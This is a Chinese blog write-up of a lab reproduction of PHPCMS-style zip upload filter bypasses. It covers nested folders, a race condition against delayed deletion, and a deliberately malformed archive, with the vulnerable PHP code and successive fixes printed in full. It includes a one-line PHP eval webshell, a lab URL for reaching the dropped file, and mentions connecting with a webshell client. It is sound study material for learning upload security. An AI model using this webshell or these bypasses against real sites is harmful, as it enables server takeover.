phpcms上传漏洞

已于 2024-03-11 18:35:36 修改
阅读量717 收藏 4
点赞数 4
文章标签: web安全 安全
于 2024-03-11 00:10:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70349048/article/details/136610799
版权

原始漏洞

漏洞原理:我们上传一个zip的压缩包,它会解压然后删除其中不是.jpg .gig .png的文件

  1. function check_dir($dir):这是一个PHP函数的定义,它接受一个参数 $dir,代表要检查的目录路径。

  2. $handle = opendir($dir);:使用 opendir 函数打开指定目录,并将返回的目录句柄赋值给变量 $handle

  3. while (($f = readdir($handle)) !== false):使用 readdir 函数循环读取目录中的文件,每次循环将文件名赋给变量 $f

  4. if (!in_array($f, array('.', '..'))) { ... }:在每次循环中,检查当前文件名是否为当前目录(.)或父目录(..),如果不是,则执行下面的操作。

  5. $ext = strtolower(substr(strrchr($f, '.'), 1));:使用 strrchr 函数找到文件名中的最后一个 .,然后使用 substr 截取文件扩展名,并用 strtolower 将其转换为小写。

  6. if (!in_array($ext, array('jpg', 'gif', 'png'))) { unlink($dir . $f); }:如果文件的扩展名不是jpg、gif或png,则使用 unlink 函数删除该文件。

<?php
header("Content-Type:text/html; charset=utf-8");
require_once('pclzip.lib.php');

$file = $_FILES['file'];
if ($file['size'] == 0) {
    exit("请勿上传空文件");
}
$name = $file['name'];
$dir = 'uploads/';
$ext = strtolower(substr(strrchr($name, '.'), 1));


function check_dir($dir)
{
    $handle = opendir($dir);
    while (($f = readdir($handle)) !== false) {
        if (!in_array($f, array('.', '..'))) {
            $ext = strtolower(substr(strrchr($f, '.'), 1));
            if (!in_array($ext, array('jpg', 'gif', 'png'))) {
                unlink($dir . $f);
            }
        }
    }
}


if (!is_dir($dir)) {
    mkdir($dir);
}

$temp_dir = $dir . 'member/1/';
if (!is_dir($temp_dir)) {
    mkdir($temp_dir);
}

if (in_array($ext, array('zip', 'jpg', 'gif', 'png'))) {
    if ($ext == 'zip') {
        $archive = new PclZip($file['tmp_name']);
        if ($archive->extract(PCLZIP_OPT_PATH, $temp_dir, PCLZIP_OPT_REPLACE_NEWER) == 0) {
            exit("解压失败");
        }
        check_dir($temp_dir);
        exit('上传成功!');
    } else {
        move_uploaded_file($file['tmp_name'], $temp_dir . '/' . $file['name']);
        check_dir($temp_dir);
        exit('上传成功!');
    }
} else {
    exit('仅允许上传zip、jpg、gif、png文件!');
}

如果我们把图片和php一句话木马文件一起压缩,上传后就会发现php被删除了。

绕过方法:我们把php文件单独放在一个文件夹中,然后将这个文件夹和图片一起压缩成zip,然后上传

这个bbb文件夹里面的111.php就没有被删除了,然后就可以连接蚁剑了

修复后版本

上面主要是没有进行递归删除导致的绕过,修复之后进行了递归删除

<?php
header("Content-Type:text/html; charset=utf-8");
require_once('pclzip.lib.php');

$file = $_FILES['file'];
if ($file['size'] == 0) {
    exit("请勿上传空文件");
}
$name = $file['name'];
$dir = 'uploads/';
$ext = strtolower(substr(strrchr($name, '.'), 1));


function check_dir($dir)
{
    $handle = opendir($dir);
    while (($f = readdir($handle)) !== false) {
        if (!in_array($f, array('.', '..'))) {
            if (is_dir($dir . $f)) {
                check_dir($dir . $f . '/');
            } else {
                $ext = strtolower(substr(strrchr($f, '.'), 1));
                if (!in_array($ext, array('jpg', 'gif', 'png'))) {
                    unlink($dir . $f);
                }
            }
        }
    }
}


if (!is_dir($dir)) {
    mkdir($dir);
}

$temp_dir = $dir . 'member/1/';
if (!is_dir($temp_dir)) {
    mkdir($temp_dir);
}

if (in_array($ext, array('zip', 'jpg', 'gif', 'png'))) {
    if ($ext == 'zip') {
        // $zip = new ZipArchive;
        // if(!$zip->open($file['tmp_name'])) {
        //     echo "fail";
        //     return false;
        // }

        // if(!$zip->extractTo($temp_dir)) {
        //     // check_dir($temp_dir);
        //     exit('fail to zip');
        // }
        $archive = new PclZip($file['tmp_name']);
        if ($archive->extract(PCLZIP_OPT_PATH, $temp_dir, PCLZIP_OPT_REPLACE_NEWER) == 0) {
            exit("解压失败");
        }
        check_dir($temp_dir);
        exit('上传成功!');
    } else {
        move_uploaded_file($file['tmp_name'], $temp_dir . '/' . $file['name']);
        check_dir($temp_dir);
        exit('上传成功!');
    }
} else {
    exit('仅允许上传zip、jpg、gif、png文件!');
}

上传zip后我们发现,bbb中的111.php就被删除了

但是代码逻辑是先解压,后删除,我们就用时间竞争来绕过

因为我发现,同时使用burp上传和访问,经过多次尝试没有成功,我换了个操作,使用手动上传zip,burp访问php,多次手动上传之后,成功了

在我们的uploads下面生成了一句话木马文件,直接连蚁剑

再次修复版

<?php
header("Content-Type:text/html; charset=utf-8");
require_once('pclzip.lib.php');

$file = $_FILES['file'];
if ($file['size'] == 0) {
    exit("请勿上传空文件");
}
$name = $file['name'];
$dir = 'uploads/';
$ext = strtolower(substr(strrchr($name, '.'), 1));


function check_dir($dir)
{
    $handle = opendir($dir);
    while (($f = readdir($handle)) !== false) {
        if (!in_array($f, array('.', '..'))) {
            if (is_dir($dir . $f)) {
                check_dir($dir . $f . '/');
            } else {
                $ext = strtolower(substr(strrchr($f, '.'), 1));
                if (!in_array($ext, array('jpg', 'gif', 'png'))) {
                    unlink($dir . $f);
                }
            }
        }
    }
}


if (!is_dir($dir)) {
    mkdir($dir);
}

$temp_dir = $dir . 'member/1/';
if (!is_dir($temp_dir)) {
    mkdir($temp_dir);
}

$temp_dir = $dir.md5(time(). rand(1000,9999)).'/'; //随机数生成文件,无法确定文件路径及文件名
if (in_array($ext, array('zip', 'jpg', 'gif', 'png'))) {
    if ($ext == 'zip') {
        $zip = new ZipArchive;
        if(!$zip->open($file['tmp_name'])) {
            echo "fail";
            return false;
        }

        if(!$zip->extractTo($temp_dir)) {
            // check_dir($temp_dir);
            exit('fail to zip');
        }
        // $archive = new PclZip($file['tmp_name']);
        // if ($archive->extract(PCLZIP_OPT_PATH, $temp_dir, PCLZIP_OPT_REPLACE_NEWER) == 0) {
        //     exit("解压失败");
        // }
        check_dir($temp_dir);
        exit('上传成功!');
    } else {
        move_uploaded_file($file['tmp_name'], $temp_dir . '/' . $file['name']);
        check_dir($temp_dir);
        exit('上传成功!');
    }
} else {
    exit('仅允许上传zip、jpg、gif、png文件!');
}

他还是先解压报错,后删除文件,我们制作一个能报错的zip,内含一句话木马的,然后直接上传错误的zip。

111.php:

<?php
@eval($_POST['a']);
?>

在aaaaaaa中存在以上文件,生成aaaaaaa.zip压缩包,然后对压缩包进行制作

最后解压要报错

将制作好的zip上传,同时使用burp连续访问

http://192.168.43.244/upload/uploads/26ae527babcadb24e0aedf1c9c0bcb3e/111.php

手动多次上传zip保证刚解压出来的111.php被访问到

发现上传成功了,生成了随机名文件

查看一句话木马发现已经生成

上蚁剑

造成以上漏洞的原因就是,解压完成的文件没有进行递归删除,导致包含其中的一句话木马绕过了。

三次修复版本

他是在上面的修复中,加了一个递归删除操作,这样做会将解压后的文件夹中的文件再进行递归删除。

        if(!$zip->extractTo($temp_dir)) {
            check_dir($temp_dir);
            exit('fail to zip');
        }

再次上传我们发现随机文件下的木马没了

这个的绕过方式就是逃出递归删除的目录,在解压的时候,将php直接上传到非解压路径

修改以上三个地方即可

不过我在复现时,zip怎么都不报错,暂时没成功

就不做程序猿
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpcms v9文件上传漏洞复现
qq_50646296的博客
08-21 1838
我们通过软件burp suite 抓包,修改一个变量,不停的发包,我们可以手动或者让软件不停的访问我们呢上传的PHP,如果显示出PHP内容,时间竞争成功。方法:我们发现它只是删除了压缩包里面的文件,但这段代码并不会对解压后的文件夹递归删除,只能对解压的文件直接删除。分析:当程序不递归删除时,我们直接将图片和.php文件压缩上传,会发现图片还在,.php文件被删除了。此时,我们再将其上传,可以看到,我们的PHP文件就被保留下来了。我们创建一个文件夹,放入以下文件,然后将这个文件经行压缩。
phpcms 漏洞姿势
热门推荐
2ed
06-26 2万+
一 .PHPCMS V9本地文件包含漏洞 漏洞出现在如下文件:phpcms/modules/search/index.php 代码如下: 本处大家会发现在使用file_get_contents函数时没有过滤get方式得到的m参数 因此可以构造payload如下 www.xxx.com/m=search&a=public_get_suggest_keyword&q=../../ph...
【2】phpcms v9.6.0任意文件上传漏洞
司徒荆的博客
05-21 2542
phpcms v9.6.0任意文件上传漏洞
phpcms头像上传漏洞引发的故事
qq_68163788的博客
03-15 1611
PHPcms中存在一个头像上传漏洞,黑客可以利用这个漏洞上传恶意文件,比如Webshell,从而获取网站服务器的控制权。黑客通过Webshell开始操控网站服务器,窃取用户的个人信息、数据库信息甚至敏感的财务数据。黑客还可能利用服务器资源进行挖矿、发送垃圾邮件等恶意活动,给网站和用户带来严重的损失。 网站管理员在发现异常后赶紧封锁了黑客的访问,但已经造成了不可挽回的损失。为了修复漏洞和加强安全措施,网站管理员不得不花费大量时间和精力,重新设计和部署网站系统,修复漏洞并加强安全性,以防止类似事件再次发生。
最全PHPcms V9 任意文件上传漏洞_phpcmsv9漏洞(3),2024年最新闭关60天学懂NDK+物联网嵌入式
最新发布
2401_85015332的博客
05-15 341
漏洞爆出来的时间是2017年4月份左右,时间比较长了,存在任意文件长传,漏洞利用比较简单,危害很大,可以直接前台getshell。
phpcmsV9.6.0sql注入漏洞分析
shelter1234567的博客
09-11 1414
本次分析phpcmsV9.6.0 的sql注入漏洞,过程很曲折,就像cc链一样,要一步一步找到利用的链。纯手动分析没有软件调试,中间找类啊,方法啊 ,都是按照代码流程写的流程分析的,对自己也是一个挑战吧!
phpcms安全漏洞合集
linhui03的博客
02-14 3315
1、宽字节注入漏洞 /phpcms/modules/pay/respond.php位置约16行 原来代码 $payment = $this->get_by_code($_GET['code']); 替换为 $payment = $this->get_by_code(mysql_real_escape_string($_GET['code'])); 2、phpcms注...
phpcmsv9.0任意文件上传漏洞解析
01-19
漏洞存在地址: burp抓包 POST /phpcms_v9.6.0_UTF8/install_package/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1 Host: 192.168.0.109 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:...
phpcmsV9.6.3升级补丁漏洞修复代码功能二次开发补丁phpcms网站开发教程文档手册
03-18
本压缩包包括多年积累的phpcms网站开发升级补丁,漏洞修复补丁。 其中包括教程文档: 后台安装过程中报错 弹出新窗口而不是新选项卡 浏览器不支持缩略图flash上传改H5 表单发送的邮件不显示表单内容 升级后台编辑器-...
PHPCMS 修改flash附件上传 改为H5上传
05-15
本文将详细介绍如何将PHPCMS中的Flash附件上传功能修改为H5上传功能。 一、Flash上传的局限性 Flash作为早期的多媒体技术,曾经广泛用于网页中的动画和视频播放,以及文件上传。然而,由于其存在严重的安全漏洞,...
phpcms 漏洞处理过的系统.rar
10-30
phpcms 漏洞处理过的系统】 PHP CMS(php Content Management System)是一种基于PHP语言开发的内容管理系统,常用于构建动态网站。它以其强大的功能、易用性和灵活性受到许多开发者的青睐。然而,任何软件都有...
phpcmsv9最新利用工具
04-01
phpcmsv9最新利用工具
PHPCMS V9专题模块注入漏洞的分析与修复方法
09-29
本文来分析一下PHPCMS V9专题模块注入漏洞
phpcmsV9附件上传修改flash上传为h5上传源码
06-11
phpcmsV9附件上传修改】是一个针对当前网络环境变化的重要升级。随着浏览器对Flash支持的逐渐淘汰,网站开发者必须转向更加现代、安全的技术。在本案例中,我们看到【phpcmsV9】的附件上传功能由传统的Flash上传...
Phpcms V9.6.0任意文件写入getshell
主题模板站的博客
01-21 589
PHPcms v9.6的任意文件上传漏洞,已经潜伏半年多的一个漏洞。该漏洞可以在用户注册界面以未授权的情况下实现任意文件上传phpcms v9.6正常部署phpcms v9.6就好。复现过程中,可以在用户注册页面通过POST提交:在src后面跟上自己shell的url。注意是要.txt格式写的shell。网上已经有逆向分析的过程,这次我来正向的分析一下这个洞。首先看到用户注册的模块,位于phpcms/modules/member/index.php的register方法中。代码很多,一点点往下看:完成了
Phpcms漏洞
Grey的博客
07-08 2794
phpcms漏洞 最近某位大牛说,将放出3个phpcms的0day漏洞,目前我所了解到的已经有2个phpcms漏洞被流传开来,并放出了poc。phpcms应用范围还是比较广的,在此记录分享一下几个最新的phpcms漏洞。免责申明:文章中的工具等仅供个人测试研究,请在下载后24小时内删除,不得用于商业或非法用途,否则后果自负phpcms 任意文件读取漏洞更新于2017年5月4日漏洞具体细节参考:ht...
PHPCMS v9.6.0版任意文件上传漏洞分析笔记
foolisheddy
05-05 4550
PHPCMS v9.6.0版任意文件上传漏洞分析笔记 PHPCMS v9.6.0版任意文件上传漏洞分析笔记 参考: 安装: 漏洞复现: 漏洞分析: index.php member/index.php 正常请求 register()函数: htmlspecialchars()函数: menberinput−&gt;get(menberinput−&gt;get(menber_input->g...
phpcms api.php,phpcms注入漏洞【/api/phpsso.php】
weixin_42131728的博客
03-10 267
漏洞名称:phpcms注入漏洞补丁文件:/api/phpsso.php漏洞描述:phpcms注入漏洞。【注意:该补丁为云盾自研代码修复方案,云盾会根据您当前代码是否符合云盾自研的修复模式进行检测,如果您自行采取了底层/框架统一修复、或者使用了其他的修复方案,可能会导致您虽然已经修复了改漏洞,云盾依然报告存在漏洞,遇到该情况可选择忽略该漏洞提示】源代码:/*** 同步登陆*/if ($action ...
phpcms v9上传图片改为h5
07-27
PHPCMS v9 是一种流行的网站内容管理系统,用于创建和维护网站。它有一个功能强大的图片上传功能,但目前是基于Flash的。然而,随着技术的发展和浏览器对Flash支持度的下降,越来越多的开发者将图片上传功能改为HTML5。 将PHPCMS v9的图片上传改为HTML5有许多好处。首先,HTML5支持跨平台和跨浏览器,几乎所有现代浏览器都支持HTML5。相比之下,Flash对某些平台和设备的支持可能有限。其次,HTML5无需用户安装任何插件或软件,使得用户使用更加便捷。最后,使用HTML5可以提供更好的用户体验,例如拖放上传、实时预览和进度条等。 要将PHPCMS v9的图片上传改为HTML5,首先需要更新后端代码,以便支持新的上传方式。PHP是PHPCMS的后端语言,可以使用PHP的文件上传函数来处理HTML5的文件上传。其次,需要更新前端代码,以便替换掉原来的Flash上传组件。在HTML5中,可以使用input标签的type属性设置为file来创建一个文件上传表单控件,并使用JavaScript监听文件选择或拖放事件,实现实时预览和进度条功能。 除了修改代码,还需要更改PHPCMS的配置文件,以便将上传存储路径更改为服务器上合适的文件夹。同时,需要相应地更改数据库中存储图片信息的表结构,以适应新的图片上传方式。 总结而言,将PHPCMS v9的图片上传改为HTML5是一个重要的升级步骤,可以提供更好的用户体验和更广泛的平台兼容性。需要改动后端和前端代码,并相应地更新配置文件和数据库表结构。这样做可以使得网站更加现代化和可访问,适应不断变化的技术环境。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值